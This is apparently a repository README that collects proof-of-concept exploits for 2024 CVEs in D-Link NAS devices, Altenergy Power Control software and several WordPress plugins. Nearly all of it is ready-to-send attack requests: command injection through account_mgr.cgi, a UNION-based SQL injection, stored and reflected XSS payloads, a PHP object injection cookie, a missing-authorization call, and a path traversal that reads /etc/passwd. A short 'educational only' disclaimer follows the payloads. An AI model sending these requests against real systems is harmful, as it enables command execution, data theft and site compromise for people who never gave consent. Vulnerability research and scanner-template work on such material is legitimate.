CVE Exploits and PoC Collection

nuclei-templates 🔍

This repository contains proof-of-concept (PoC) exploits for several WordPress plugins and other servers/websites with known vulnerabilities. These examples are for educational and research purposes only. Use responsibly.

⚠️ Vulnerabilities

✅ CVE-2024-10914

A vulnerability was found in D-Link DNS-320, DNS-320LW, DNS-325 and DNS-340L up to 20241028

GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27 HTTP/1.1

✅ CVE-2024-11305

A vulnerability classified as critical was found in Altenergy Power Control Software up to 20241108

POST /index.php/display/status_zigbee HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Connection: close

date=2024-11-06%' UNION ALL SELECT 11,CHAR(113)CHAR(75,101,86,69,115,83,113,89,100,122,121,102,83,83,113,86,84,112,100,103,69,75,80,117,88,109,83,105,89,116,110,120,76,84,73,109,115,100,83,107)CHAR(113,118,98,98,113),11-- wPIB

✅ CVE-2024-10793

WP Security Audit Log Plugin Detection An XSS vulnerability that allows injecting malicious scripts.

curl -X POST 'http://example.com/wp-admin/admin-ajax.php' \
     -d 'action=destroy-sessions&user_id=<script>alert("XSS found windz3r0day")</script>'

✅ CVE-2024-11199

Stored Cross-Site Scripting via the plugin's rescue_progressbar shortcode

[rescue_progressbar visibility='foo" onclick="alert(/XSS/)"']

✅ CVE-2024-11381

Stored Cross-Site Scripting via the plugin's ch_registro shortcode

[ch_registro note='"onmouseover="alert(/XSS/)"']

✅ CVE-2024-43919

YARPP <= 5.30.10 - Missing Authorization This exploit allows unauthorized access to modify display types.

GET /wp-content/plugins/yet-another-related-posts-plugin/includes/yarpp_pro_set_display_types.php?ypsdt=false&types[]=post&types[]=page HTTP/1.1
Host: example.com

✅ CVE-2024-52433

My Geo Posts Free <= 1.2 - Unauthenticated PHP Object Injection

GET / HTTP/2
Host: wp-dev.ddev.site
Cookie: mgpf_geo_coockie=TzoyMDoiUEhQX09iamVjdF9JbmplY3Rpb24iOjA6e30=

✅ CVE-2024-9935

PDF Generator Addon for Elementor Page Builder <= 1.7.5 - Unauthenticated Arbitrary File Download

GET /elementor-84/?rtw_generate_pdf=true&rtw_pdf_file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Priority: u=0, i

▶▶▶ Disclaimer

This repository is intended for educational purposes only. Use of these exploits on systems or websites without explicit permission is illegal and unethical. The creator is not responsible for any misuse of this information.

---

Support Me

If you find this work helpful, you can support me:

• 

Thanks for your support! ❤️